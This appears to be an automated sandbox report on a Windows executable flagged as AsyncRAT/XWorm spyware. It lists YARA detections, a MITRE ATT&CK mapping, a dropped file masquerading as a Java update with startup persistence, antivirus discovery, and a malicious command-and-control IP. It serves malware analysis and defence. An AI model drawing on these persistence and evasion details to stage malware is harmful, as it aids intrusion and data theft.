Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Users\user\Desktop\03VPFXH490.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 03VPFXH490.exe, type: SAMPLE
Source: Yara match	File source: 0.0.03VPFXH490.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1675093210.0000000000A52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 03VPFXH490.exe PID: 7316, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Java Update (32bit).exe, type: DROPPED

Source: 03VPFXH490.exe, 00000000.00000002.2978470207.000000001BDF8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\03VPFXH490.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 03VPFXH490.exe, type: SAMPLE
Source: Yara match	File source: 0.0.03VPFXH490.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1675093210.0000000000A52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2941379266.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2941379266.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 03VPFXH490.exe PID: 7316, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Java Update (32bit).exe, type: DROPPED

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 03VPFXH490.exe, type: SAMPLE
Source: Yara match	File source: 0.0.03VPFXH490.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1675093210.0000000000A52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2941379266.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2941379266.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 03VPFXH490.exe PID: 7316, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Java Update (32bit).exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 Input Capture	2 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	1 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	2 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	11 Obfuscated Files or Information	Security Account Manager	541 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Registry Run Keys / Startup Folder	2 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
03VPFXH490.exe	79%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT
03VPFXH490.exe	100%	Avira	TR/Spy.Gen
03VPFXH490.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\Java Update (32bit).exe	100%	Avira	TR/Spy.Gen
C:\ProgramData\Java Update (32bit).exe	100%	Joe Sandbox ML
C:\ProgramData\Java Update (32bit).exe	79%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT

Source	Detection	Scanner	Label	Link
http://wwpkiops/Docs/Repository.htm0	0%	Avira URL Cloud	safe
45.141.26.234	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
45.141.26.234	true	Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://wwpkiops/Docs/Repository.htm0	powershell.exe, 00000004.00000002.1810793540.0000020C89955000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1775096450.0000023A10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1860716635.0000020C99A54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1981436782.0000019590074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162812743.0000024B261A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000B.00000002.2054973292.0000024B16358000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.1761890443.0000023A00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811776017.0000020C89C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1906005748.0000019580229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2054973292.0000024B16358000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000B.00000002.2054973292.0000024B16358000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.1761890443.0000023A00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811776017.0000020C89C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1906005748.0000019580229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2054973292.0000024B16358000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.micom/pkiops/Docs/ry.htm0	powershell.exe, 0000000B.00000002.2194033435.0000024B2E830000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000B.00000002.2162812743.0000024B261A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1775096450.0000023A10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1860716635.0000020C99A54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1981436782.0000019590074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162812743.0000024B261A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000B.00000002.2162812743.0000024B261A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000B.00000002.2162812743.0000024B261A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000001.00000002.1761890443.0000023A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811776017.0000020C899E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1906005748.0000019580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2054973292.0000024B16131000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	03VPFXH490.exe, 00000000.00000002.2941379266.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1761890443.0000023A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811776017.0000020C899E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1906005748.0000019580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2054973292.0000024B16131000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.m	powershell.exe, 00000001.00000002.1782938063.0000023A760B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000B.00000002.2054973292.0000024B16358000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
45.141.26.234	unknown	Netherlands		62068	SPECTRAIPSpectraIPBVNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574851
Start date and time:	2024-12-13 17:44:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	03VPFXH490.exe renamed because original name is a hash value
Original Sample Name:	f9a6811d7a9d5e06d73a68fc729ce66c.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@13/20@1/2
EGA Information:	Successful, ratio: 20%
HCA Information:	Successful, ratio: 100% Number of executed functions: 50 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 3940 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7448 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7684 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7956 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: 03VPFXH490.exe

Simulations

Behavior and APIs

Time	Type	Description
11:45:05	API Interceptor	48x Sleep call for process: powershell.exe modified
11:45:53	API Interceptor	517757x Sleep call for process: 03VPFXH490.exe modified
16:45:57	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	Chrome Browser Update.exe	Get hash	malicious	Predator	Browse	ip-api.com/json/
	boleto.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	taskhost.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	XClient.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	jrockekcurje.exe	Get hash	malicious	Blackshades	Browse	ip-api.com/json/
	hbfgjhhesfd.exe	Get hash	malicious	Blackshades	Browse	ip-api.com/json/
	Uniswap Sniper Bot With GUI.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json
	K98766700.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	phost.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	sppawx.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
45.141.26.234	_%e0%b8%b0%e0%b8%99%e0%b8%b2%e0%b8%b3%e0%b8%b7.exe	Get hash	malicious	AsyncRAT, XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	Chrome Browser Update.exe	Get hash	malicious	Predator	Browse	208.95.112.1
	boleto.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	taskhost.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	XClient.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	jrockekcurje.exe	Get hash	malicious	Blackshades	Browse	208.95.112.1
	hbfgjhhesfd.exe	Get hash	malicious	Blackshades	Browse	208.95.112.1
	Uniswap Sniper Bot With GUI.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	K98766700.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	phost.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	sppawx.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPECTRAIPSpectraIPBVNL	saiya.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	45.141.26.134
	windxcmd.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	45.141.26.134
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	45.138.53.54
	18fvs4AVae.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	45.141.26.170
	Fulloption_V2.1.exe	Get hash	malicious	XWorm	Browse	45.141.27.248
	BoostFPS.exe	Get hash	malicious	XWorm	Browse	45.141.27.248
	bPRQRIfbbq.exe	Get hash	malicious	Unknown	Browse	45.138.16.44
	4Fm0sK0yKz.exe	Get hash	malicious	AsyncRAT	Browse	45.141.215.18
	Payload 94.75 (3).225.exe	Get hash	malicious	Unknown	Browse	45.141.215.40
	Payload 94.75 (2).225.exe	Get hash	malicious	Unknown	Browse	45.141.215.116
TUT-ASUS	Chrome Browser Update.exe	Get hash	malicious	Predator	Browse	208.95.112.1
	boleto.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	taskhost.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	XClient.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	jrockekcurje.exe	Get hash	malicious	Blackshades	Browse	208.95.112.1
	hbfgjhhesfd.exe	Get hash	malicious	Blackshades	Browse	208.95.112.1
